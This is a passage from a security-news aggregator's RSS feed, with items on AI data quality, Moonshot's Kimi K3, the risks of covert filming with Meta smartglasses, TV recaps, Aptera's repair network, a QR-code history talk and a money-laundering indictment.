checks.</p><p>The result showed up downstream: better accuracy across the board, in reporting, in the ML models, and in AI retrieval built on top of that same data.</p><h2>What to do Monday morning</h2><p>If you're running retrieval-based AI systems in production, the diagnostic question isn't which model to try next or which retrieval architecture to migrate to. It's four narrower questions: </p><ul><li><p>Is the underlying data validated against the standards required by its consumers?</p></li><li><p>What's the oldest piece of content currently being served with high confidence?</p></li><li><p>Would two chunks of the same source ever disagree with each other in the same retrieval result?</p></li><li><p>Could you trace where it came from if it turned out to be wrong?</p></li></ul><p>If you can't answer those questions, then the gap lies in the pipeline between your source systems and whatever your agent reads from. That’s a data engineering fix, not a model swap or a vendor migration.</p><p>Whether you're building reporting pipelines, ML systems, or AI agents, correctness, freshness, consistency, and lineage are what make data trustworthy. AI simply exposes weaknesses that have existed in data engineering all along. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China’s Kimi K3 fuels fears safety curbs are holding back US AI]]></title>
<description><![CDATA[Chinese unicorn Moonshot AI’s new Kimi K3 model rivals top US systems in spotting cybersecurity flaws, according to early research, stoking fears in Washington that strict safety guard rails are putting American artificial intelligence firms at a competitive disadvantage.
The 2.8 trillion-paramet...]]></description>
<link>https://tsecurity.de/de/3683960/it-security-nachrichten/chinas-kimi-k3-fuels-fears-safety-curbs-are-holding-back-us-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683960/it-security-nachrichten/chinas-kimi-k3-fuels-fears-safety-curbs-are-holding-back-us-ai/</guid>
<pubDate>Tue, 21 Jul 2026 16:10:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Chinese unicorn Moonshot AI’s new Kimi K3 model rivals top US systems in spotting cybersecurity flaws, according to early research, stoking fears in Washington that strict safety guard rails are putting American artificial intelligence firms at a competitive disadvantage.
The 2.8 trillion-parameter open-weight model, released last week, offers cybersecurity performance “extremely close” to OpenAI’s flagship GPT-5.6 Sol at a fraction of the cost, Swiss firm Aikido Security said in a report on...]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta’s smartglasses mean any child can be covertly filmed. In the age of AI, how do we tackle that risk?]]></title>
<description><![CDATA[The company argues that it’s for individuals to ensure they don’t ‘actively exploit’ this technology. That won’t keep children safeIt took me a while to realise what the man sitting next to me on the train was doing. He was flicking through pictures of a little girl on his phone; zooming in on so...]]></description>
<link>https://tsecurity.de/de/3683034/it-nachrichten/metas-smartglasses-mean-any-child-can-be-covertly-filmed-in-the-age-of-ai-how-do-we-tackle-that-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683034/it-nachrichten/metas-smartglasses-mean-any-child-can-be-covertly-filmed-in-the-age-of-ai-how-do-we-tackle-that-risk/</guid>
<pubDate>Tue, 21 Jul 2026 10:33:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The company argues that it’s for individuals to ensure they don’t ‘actively exploit’ this technology. That won’t keep children safe</p><p>It took me a while to realise what the man sitting next to me on the train was doing. He was flicking through pictures of a little girl on his phone; zooming in on some, cropping the images. Hardly unusual, of course, except that on closer inspection the pictures were very clearly of the toddler sitting opposite us, playing with her parents. On a crowded train of people mostly staring obliviously at our own phones, a stranger had been covertly photographing that little girl over and over again. And if it hadn’t been for that very visible phone screen giving him away, he wouldn’t have been caught.</p><p>That encounter was a while ago but my memory was jogged last week listening to a clip of Meta’s VP of wearables, Alex Himel, talk fondly to the BBC about using his new smartglasses <a href="https://www.bbc.co.uk/sounds/play/m002sr4h">to film his daughter</a> singing in a talent contest.<strong> </strong>They let him capture the memory without having to watch her through a screen, he said, freeing him to be “kind of living in the moment, head up and hands free”. So far, so sweet. But what about the risk of creeps potentially using them to film other people’s daughters covertly, heads up and hands free? Meta’s smartglasses have a tiny flashing warning light on the frame to indicate when the wearer is recording, but the technology is still new enough that many people don’t think to look for it. And in the age of AI, stolen images of children matter. Taken in real life or <a href="https://www.theguardian.com/society/2026/jul/03/ai-sexual-abuse-fears-uk-parents-warned-posting-images-children-national-crime-agency">scraped from the internet</a>, they’re the raw material for generating realistic-looking child abuse material of the most extreme and disturbing kind. (If that sounds like a grim but ultimately fairly victimless crime, the <a href="https://www.iwf.org.uk/about-us/why-we-exist/our-research/how-ai-is-being-abused-to-create-child-sexual-abuse-imagery/">Internet Watch Foundation warned</a> in a recent report that AI-generated material risks fuelling sexual interest in children, normalising violence and increasing the risk of real-life offending.)</p><p>Gaby Hinsliff is a Guardian columnist</p><p><em><strong>Do you have an opinion on the issues raised in this article? If you would like to submit a response of up to 300 words by email to be considered for publication in our<a href="https://www.theguardian.com/tone/letters"> letters</a> section, please <a href="mailto:guardian.letters@theguardian.com?body=Please%20include%20your%20name,%20full%20postal%20address%20and%20phone%20number%20with%20your%20letter%20below.%20Letters%20are%20usually%20published%20with%20the%20author%27s%20name%20and%20city/town/village.%20The%20rest%20of%20the%20information%20is%20for%20verification%20only%20and%20to%20contact%20you%20where%20necessary.">click here</a>.</strong></em></p> <a href="https://www.theguardian.com/commentisfree/2026/jul/21/meta-smartglasses-child-filmed-ai-risk-technology">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘House of the Dragon’ Season 3, Episode 5 Recap: Alicent and Helaena Face a Dark Fate]]></title>
<description><![CDATA[House of the Dragon Season 3, Episode 5 slows the pace after the conflict at Tumbleton, focusing on the personal and political consequences spreading across Westeros. Titled “Unbowed and Unbent,” the episode follows several characters who have lost control of their lives, armies, and claims to po...]]></description>
<link>https://tsecurity.de/de/3681763/ios-mac-os/house-of-the-dragon-season-3-episode-5-recap-alicent-and-helaena-face-a-dark-fate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681763/ios-mac-os/house-of-the-dragon-season-3-episode-5-recap-alicent-and-helaena-face-a-dark-fate/</guid>
<pubDate>Mon, 20 Jul 2026 19:04:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[House of the Dragon Season 3, Episode 5 slows the pace after the conflict at Tumbleton, focusing on the personal and political consequences spreading across Westeros. Titled “Unbowed and Unbent,” the episode follows several characters who have lost control of their lives, armies, and claims to power.



Spoiler warning: This recap contains major spoilers for House of the Dragon Season 3, Episode 5.




Episode title: Unbowed and Unbent



Release date: July 19, 2026



Streaming platform: HBO Max



Genre: Fantasy drama




The episode arrived on HBO and HBO Max in the United States on Sunday, July 19, while viewers in several international regions received it on Monday, July 20. New episodes continue to release weekly.



Alicent and Helaena Try to Escape the Red Keep



The most disturbing storyline follows Alicent and a pregnant Helaena, who remain prisoners inside the Red Keep after Rhaenyra’s forces captured King’s Landing.



Alicent discovers a hidden passage connected to Rhaenyra’s old bedroom and decides that it could offer them a way out. However, Helaena initially refuses to enter the tunnels because they remind her of the men who murdered her son, Jaehaerys.



She eventually follows Alicent, but their escape soon goes wrong. The narrow passage leads them deeper into the castle's hidden structure, where they become trapped without light or a clear route back.



Their situation reflects how far both women have fallen. Alicent once influenced kings and controlled the royal court, while Helaena carried the title of queen. They now find themselves buried inside the walls of the same political system that once protected them.



Daemon knows many of the Red Keep’s hidden routes, which leaves open the possibility that he could find them in Episode 6. However, their disappearance could create another serious problem for Rhaenyra’s unstable rule.



Aemond Finds Comfort With Alys Rivers







At Harrenhal, Aemond continues recovering from his injuries while struggling with nightmares and guilt. He dreams about Aegon and fears that Helaena’s warning about his death will come true.



Alys Rivers cares for him during his weakest moments. Their relationship develops with surprising tenderness as Alys helps him face his fear of losing Vhagar and his position in the war. Aemond also protects her when danger arrives, revealing a softer side rarely seen in previous seasons.



Criston Cole Prepares for His Final Battle



Criston Cole’s forces face growing resistance in the Riverlands as Oscar Tully counters his guerrilla attacks. With morale collapsing and the road to Tumbleton closing, Cole accepts that he may not survive the coming confrontation.



His speech to his remaining soldiers strongly prepares the story for the Butcher’s Ball, one of the Dance of the Dragons’ most brutal events. In the book, Cole dies after attempting to negotiate, but the series appears ready to give the confrontation a more personal focus.



Who Killed Rhaenyra’s Gold Cloaks?



The episode ends with Daemon discovering several murdered members of the City Watch, including men loyal to Rhaenyra. Their bodies have been arranged beneath a message written in blood: “A feast for traitors.”



Ormund Hightower arranged the attack as part of a larger campaign to weaken Rhaenyra’s control over King’s Landing. By targeting her enforcers and spreading anti-crown propaganda, he hopes to turn the smallfolk against her from within.



House of the Dragon Season 3, Episode 5 replaces dragon battles with fear, isolation, and political sabotage. Alicent and Helaena remain trapped, Criston prepares for a final stand, and Rhaenyra faces a growing rebellion inside her new capital.



What do you think will happen to Alicent and Helaena, and will Daemon find them before it is too late? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Aptera Announces US-Wide Repair Network for Its Upcoming Solar Electric Car]]></title>
<description><![CDATA[Solar car maker Aptera has "officially announced a repair network partnership which will give owners of its upcoming solar electric car access to thousands of repair shops nationwide," reports Electrek:



We recently got a chance to drive the Aptera solar EV and tour the company's factory, and c...]]></description>
<link>https://tsecurity.de/de/3679806/it-security-nachrichten/aptera-announces-us-wide-repair-network-for-its-upcoming-solar-electric-car/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679806/it-security-nachrichten/aptera-announces-us-wide-repair-network-for-its-upcoming-solar-electric-car/</guid>
<pubDate>Sun, 19 Jul 2026 19:44:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Solar car maker Aptera has "officially announced a repair network partnership which will give owners of its upcoming solar electric car access to thousands of repair shops nationwide," reports Electrek:



We recently got a chance to drive the Aptera solar EV and tour the company's factory, and came away both impressed at the progress that has been made, but cognizant of the long road ahead for the company. One question that often gets raised in reference to EV startups is how owners get service on their vehicles, especially those from a small company... So to waylay those fears, Aptera announced a partnership today that unlocks access to 4,300 service shops across the US, through a company called RepairPal. Aptera had been working on this partnership when we saw them at our factory tour, but today they're ready to officially announce it. 
RepairPal doesn't own its own shops, but instead certifies local shops to work on particular models of car... All shops will get access to Aptera-specific service procedures.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Aptera+Announces+US-Wide+Repair+Network+for+Its+Upcoming+Solar+Electric+Car%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F19%2F0559215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F19%2F0559215%2Faptera-announces-us-wide-repair-network-for-its-upcoming-solar-electric-car%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/19/0559215/aptera-announces-us-wide-repair-network-for-its-upcoming-solar-electric-car?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Aptera Announces Nationwide Repair Network For Its Upcoming Solar Electric Car]]></title>
<description><![CDATA[Solar car maker Aptera has "officially announced a repair network partnership which will give owners of its upcoming solar electric car access to thousands of repair shops nationwide," reports Electrek:



We recently got a chance to drive the Aptera solar EV and tour the company's factory, and c...]]></description>
<link>https://tsecurity.de/de/3679728/it-security-nachrichten/aptera-announces-nationwide-repair-network-for-its-upcoming-solar-electric-car/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679728/it-security-nachrichten/aptera-announces-nationwide-repair-network-for-its-upcoming-solar-electric-car/</guid>
<pubDate>Sun, 19 Jul 2026 17:53:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Solar car maker Aptera has "officially announced a repair network partnership which will give owners of its upcoming solar electric car access to thousands of repair shops nationwide," reports Electrek:



We recently got a chance to drive the Aptera solar EV and tour the company's factory, and came away both impressed at the progress that has been made, but cognizant of the long road ahead for the company. One question that often gets raised in reference to EV startups is how owners get service on their vehicles, especially those from a small company... So to waylay those fears, Aptera announced a partnership today that unlocks access to 4,300 service shops across the US, through a company called RepairPal. Aptera had been working on this partnership when we saw them at our factory tour, but today they're ready to officially announce it. 
RepairPal doesn't own its own shops, but instead certifies local shops to work on particular models of car... All shops will get access to Aptera-specific service procedures.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Aptera+Announces+Nationwide+Repair+Network+For+Its+Upcoming+Solar+Electric+Car%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F19%2F0559215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F19%2F0559215%2Faptera-announces-nationwide-repair-network-for-its-upcoming-solar-electric-car%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/19/0559215/aptera-announces-nationwide-repair-network-for-its-upcoming-solar-electric-car?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Brief History of the QR Code, and other scannable things (emf2026)]]></title>
<description><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, coverin...]]></description>
<link>https://tsecurity.de/de/3678593/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678593/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 01:03:15 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, covering not just one but TWO whole dimensions of scanning. Where was the first barcode (spoilers, it involves trains)? Is it true that barcodes caused a conspiracy in the 1980s?

We'll learn what competitors are there for the QR code and why they failed under the might of the QR. We'll explore why the QR code so pervasive in modern society and what makes them so good.

This presentation will generally be light hearted and whimsical, and will contain several jokes, some serious security advice, but generally be light entertainment. There will be no AI imagery or text.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/234-a-brief-history-of-the-qr-code-and-other-scannable-things]]></content:encoded>
</item>
<item>
<title><![CDATA[A Brief History of the QR Code, and other scannable things (emf2026)]]></title>
<description><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, coverin...]]></description>
<link>https://tsecurity.de/de/3678572/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678572/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 00:32:40 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, covering not just one but TWO whole dimensions of scanning. Where was the first barcode (spoilers, it involves trains)? Is it true that barcodes caused a conspiracy in the 1980s?

We'll learn what competitors are there for the QR code and why they failed under the might of the QR. We'll explore why the QR code so pervasive in modern society and what makes them so good.

This presentation will generally be light hearted and whimsical, and will contain several jokes, some serious security advice, but generally be light entertainment. There will be no AI imagery or text.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/234-a-brief-history-of-the-qr-code-and-other-scannable-things]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 4 Release Date and What to Expect Next]]></title>
<description><![CDATA[Silo Season 3 Episode 4 will release on Friday, July 24, 2026, on Apple TV. The upcoming chapter will continue Juliette Nichols’ dangerous search for Lukas Kyle while Camille Sims faces growing pressure from the Algorithm.



Apple confirmed that Silo Season 3 contains 10 episodes, with one new e...]]></description>
<link>https://tsecurity.de/de/3676830/ios-mac-os/silo-season-3-episode-4-release-date-and-what-to-expect-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676830/ios-mac-os/silo-season-3-episode-4-release-date-and-what-to-expect-next/</guid>
<pubDate>Fri, 17 Jul 2026 20:40:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 4 will release on Friday, July 24, 2026, on Apple TV. The upcoming chapter will continue Juliette Nichols’ dangerous search for Lukas Kyle while Camille Sims faces growing pressure from the Algorithm.



Apple confirmed that Silo Season 3 contains 10 episodes, with one new episode arriving every Friday. The season began on July 3 and will conclude on September 4, 2026.



Silo Season 3 Episode 4 release details




Release date: Friday, July 24, 2026



Streaming platform: Apple TV



Season: 3



Episode: 4



Genre: Science fiction, mystery and dystopian drama



Total Season 3 episodes: 10



Season finale date: September 4, 2026



Main star: Rebecca Ferguson as Juliette Nichols




Apple has not publicly revealed the official Episode 4 title or synopsis at the time of writing. However, the events of Episode 3 establish several major storylines that the next chapter can continue.



What happened in Silo Season 3 Episode 3?



Spoilers ahead for Silo Season 3 Episode 3.



Episode 3 places Camille Sims in control of IT after the Algorithm decides that her ability to manipulate people makes her suitable for the role. She learns that the system wants the memories of all 9,913 Silo residents erased unless she can stop the threat developing inside the structure.



Meanwhile, Juliette enters the mines with Knox as she continues looking for Lukas Kyle. Camille releases poison gas in an effort to force Lukas out, leaving Juliette close to death. Lukas eventually rescues her before a group of Outsiders takes him away.



The Algorithm later sees Juliette’s possible death as a way to calm the population. Camille reluctantly accepts an order to have her killed, placing Juliette in immediate danger heading into Episode 4.



What to expect from Silo Season 3 Episode 4



Episode 4 will likely focus on Camille’s assassination order and whether she follows the Algorithm’s instructions. Although Camille has repeatedly protected the Silo’s system, her decisions in Episode 3 show that she still questions its extreme methods.



Juliette may also begin investigating Lukas’ disappearance after recovering from the gas attack. The Outsiders who rescued Lukas appear to know more about the Silo, its surveillance system and the safeguard protocol. Finding them could give Juliette the information she needs to challenge the Algorithm.



Sheriff Paul Billings is also investigating a murder connected to the mines. His discovery that Kat Billings is an Outsider adds another personal conflict, especially as tensions between Silo residents and the hidden group continue to rise.



The “Before Times” storyline should move forward as Congressman Daniel Keene and journalist Helen Drew investigate the mysterious recording and the conspiracy surrounding the pilots. Season 3 uses two timelines to explain how the underground silos were created more than 350 years earlier.



How previous seasons led to Season 3



The first two seasons followed Juliette as she uncovered the truth about Silo 18 and learned that other silos existed nearby. Season 2 ended with Juliette returning home and becoming trapped with Bernard Holland as cleansing fire filled the airlock.



Season 3 begins with Juliette alive but suffering from memory loss. She now serves as mayor while Robert and Camille Sims use her condition to control the Silo. At the same time, the historical storyline explores the decisions that created the underground system and the catastrophe that forced humanity below the surface.



Silo Season 3 Episode 4 arrives on Apple TV on July 24. Will Camille carry out the Algorithm’s order, or will she help Juliette uncover the truth? Let us know what you think will happen in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Agent Kim Reactivated Episode 8 Predictions: Every Major Twist We Expect Next]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 8 will continue Kim Do-hyeon’s desperate search for Min-ji after another painful setback separated the father and daughter in Episode 7.



The next episode will air on Saturday, July 18, 2026, following the show’s regular Friday and Saturday schedule. Episode 7 ende...]]></description>
<link>https://tsecurity.de/de/3676815/ios-mac-os/agent-kim-reactivated-episode-8-predictions-every-major-twist-we-expect-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676815/ios-mac-os/agent-kim-reactivated-episode-8-predictions-every-major-twist-we-expect-next/</guid>
<pubDate>Fri, 17 Jul 2026 20:23:47 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 8 will continue Kim Do-hyeon’s desperate search for Min-ji after another painful setback separated the father and daughter in Episode 7.



The next episode will air on Saturday, July 18, 2026, following the show’s regular Friday and Saturday schedule. Episode 7 ended with Min-ji unknowingly entering Joo Kang-chan’s vehicle, placing her directly in the hands of one of Kim’s most dangerous enemies.



The series follows Kim Do-hyeon, an ordinary bank employee who was previously an elite black-ops agent. His hidden life resurfaces when his daughter disappears, forcing him to reconnect with old allies and confront those responsible for destroying his former team.



What happened in Agent Kim Reactivated Episode 7?



Spoilers ahead for Episode 7.



Kim followed the kidnappers to a cold-storage facility after learning that Min-ji was being held there. While he fought his way through several attackers, Min-ji refused to cooperate with Golden Teeth and eventually trapped him inside the storage area before escaping.



Kim also faced the younger brother of Agent 66, who believed that Kim had deliberately killed his older brother during a past mission. Their fight revealed the truth about the failed operation. Agent 66 had suffered a fatal injury and ordered Kim to survive rather than die beside him.



The flashbacks also showed that Kim had not leaked information about the mission. His North Korean superior, Ru Eung-ryeong, had betrayed the team, causing the operation to collapse.



Min-ji escaped into the rain but struggled with exhaustion and the freezing weather. She heard her father nearby but believed his voice was a hallucination. Kim later found the apology note she had left behind and used security footage to continue tracking her.



The episode ended with Min-ji accepting a ride from Joo Kang-chan without recognising him. Kim remained only a short distance behind, unaware that she had entered another dangerous situation.



Agent Kim Reactivated Episode 8 predictions



Episode 8 will likely begin with Kim and Seong Han-su pursuing Joo Kang-chan’s vehicle. Kim already knows that Kang-chan wants to protect his own daughter, even if that means killing Min-ji and covering up the crimes she witnessed.



Min-ji may discover Kang-chan’s identity before they reach his home. Her repeated escapes have shown that she can remain calm under pressure, so she could leave another clue that helps Kim follow their route.



Agent 66’s younger brother may also return as an unexpected ally. After learning that Kim did not cause his brother’s death, he now has a reason to target the senior official who betrayed their unit.



Meanwhile, Mole Cricket will probably continue using Min-ji as leverage. His refusal to follow the minister’s earlier order suggests that he has his own plan and may turn against both Kang-chan and the Special Missions Directorate.



The central confrontation should bring Kim closer to Min-ji while exposing more details about the conspiracy connected to his final mission. However, the series still has ten episodes, which means their reunion may face another complication before Kim can take her home safely.



Do you think Kim will finally rescue Min-ji in Episode 8, or will Joo Kang-chan escape with her again? Let us know your predictions in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Conspiracy Theorists Think Trump’s Speech Paves the Path to the Insurrection Act]]></title>
<description><![CDATA[Election deniers have spent years promoting the idea that the 2020 election was stolen. They believe Donald Trump’s speech finally proves them right.]]></description>
<link>https://tsecurity.de/de/3676263/it-nachrichten/conspiracy-theorists-think-trumps-speech-paves-the-path-to-the-insurrection-act/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676263/it-nachrichten/conspiracy-theorists-think-trumps-speech-paves-the-path-to-the-insurrection-act/</guid>
<pubDate>Fri, 17 Jul 2026 16:02:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Election deniers have spent years promoting the idea that the 2020 election was stolen. They believe Donald Trump’s speech finally proves them right.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sugar Season 2 Episode 5 Recap: Sugar Enters Pavich’s Inner Circle]]></title>
<description><![CDATA[Sugar Season 2 Episode 5, titled “Unknowns,” sees John Sugar protect Ji Moon while quietly entering Senator Pavich’s inner circle through a mysterious professor.



The episode continues the season’s central investigation into Ji’s disappearance, corrupt police officer Ray Vega, and the wider con...]]></description>
<link>https://tsecurity.de/de/3676034/ios-mac-os/sugar-season-2-episode-5-recap-sugar-enters-pavichs-inner-circle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676034/ios-mac-os/sugar-season-2-episode-5-recap-sugar-enters-pavichs-inner-circle/</guid>
<pubDate>Fri, 17 Jul 2026 14:22:59 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2 Episode 5, titled “Unknowns,” sees John Sugar protect Ji Moon while quietly entering Senator Pavich’s inner circle through a mysterious professor.



The episode continues the season’s central investigation into Ji’s disappearance, corrupt police officer Ray Vega, and the wider conspiracy operating across Los Angeles. Sugar also struggles with growing loneliness as he remains separated from the other members of his alien community.



Sugar Season 2 Episode 5 release details




Episode title: Unknowns



Release date: July 17, 2026



Streaming platform: Apple TV



Runtime: 40 minutes



Genre: Mystery, drama and science fiction



Rating: TV-MA



Main cast: Colin Farrell, Jin Ha, Raymond Lee, Tony Dalton, Laura Donnelly, Shea Whigham and Bernard White




Season 2 premiered on June 19, 2026, and contains eight episodes, with the finale scheduled for August 7. New episodes arrive weekly on Fridays.



Sugar hides Ji from Vega



Spoilers ahead for Sugar Season 2 Episode 5.



The episode begins after Sugar secretly brings Ji back from a near-fatal overdose. He takes Ji to a rehabilitation facility, where the young man can remain hidden from Vega and the corrupt officers searching for him.



Sugar then creates a false death certificate and allows Vega to believe that Ji has died. To make the story more convincing, Sugar confronts Vega at a private gathering and punches him, acting like a grieving investigator who has lost his witness.



However, Vega does not fully accept Ji’s death. He continues tracking Sugar’s movements and later returns to the cabin where Ji was found. A mounted animal head that Sugar accidentally disturbed catches Vega’s attention, suggesting that he has noticed something wrong with the scene.



Sugar enters Pavich’s inner circle



With Ji temporarily safe, Sugar returns to his investigation of Senator Pavich. He follows Dr. Stanley Ondaatje, a professor connected to Pavich, and breaks into his home.



Inside, Sugar discovers a strange document containing four circles. The meaning remains unclear, but the drawing appears connected to the secret project involving Pavich and the professor.



Sugar also finds a room filled with succulents and books about desert plants. He later approaches Ondaatje in a cactus garden and pretends to share his interest in plants. Their conversation allows Sugar to gain the professor’s trust without revealing that he has already searched his home.



Ondaatje describes the plants as stronger than they appear because they survive with very little in harsh environments. His words also reflect Sugar’s condition as someone living alone among humans while trying to understand how much he has changed.



Chuy’s phone could expose Vega



Sugar and Val also search for evidence that can support Ji’s claims against Vega. Since Ji witnessed Vega committing murder while involved in a crime himself, officials may question his reliability.



They believe Chuy could have recorded evidence on his phone. Sugar eventually finds a phone with an Aztec-style design after discovering Sandra dead from an overdose. The device could contain the proof needed to connect Vega to the murders and the operation in Downer Town.



Meanwhile, Danny accepts a boxing contract after refusing to apologize for his recent fight. Although he believes Ji has died, Sugar has secretly kept his brother alive.



The closing scenes focus on Sugar’s increasing attachment to human life. He spends the night talking with Charlotte before Peg appears and warns him that he is becoming too human.



Episode 5 pushes Sugar closer to Pavich while leaving Vega suspicious about Ji’s supposed death. What do you think the four-circle drawing means, and will Sugar’s connection with Charlotte place her in danger? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[US Charges Two Over $43M Chinese Money Laundering Operation]]></title>
<description><![CDATA[U.S. authorities have charged two New York residents, including Zhuoying Chen, in connection with an alleged Chinese money laundering network accused of laundering at least $43 million generated through cyber investment fraud schemes. The indictment, unsealed in Brooklyn, alleges the operation ra...]]></description>
<link>https://tsecurity.de/de/3675847/it-security-nachrichten/us-charges-two-over-43m-chinese-money-laundering-operation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675847/it-security-nachrichten/us-charges-two-over-43m-chinese-money-laundering-operation/</guid>
<pubDate>Fri, 17 Jul 2026 13:10:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1236" height="721" src="https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chinese money laundering" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp 1236w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-300x175.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1024x597.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-768x448.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-600x350.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-150x88.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-750x438.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1140x665.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering.webp 1236w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-300x175.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1024x597.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-768x448.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-600x350.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-150x88.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-750x438.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chinese-money-laundering-1140x665.webp 1140w" sizes="(max-width: 1236px) 100vw, 1236px" title="US Charges Two Over $43M Chinese Money Laundering Operation 1"></p><span data-contrast="auto">U.S. authorities have charged two New York residents, including Zhuoying Chen, in connection with an alleged Chinese money laundering network accused of laundering at least $43 million generated through cyber investment fraud schemes. The indictment, unsealed in Brooklyn, alleges the operation ran between 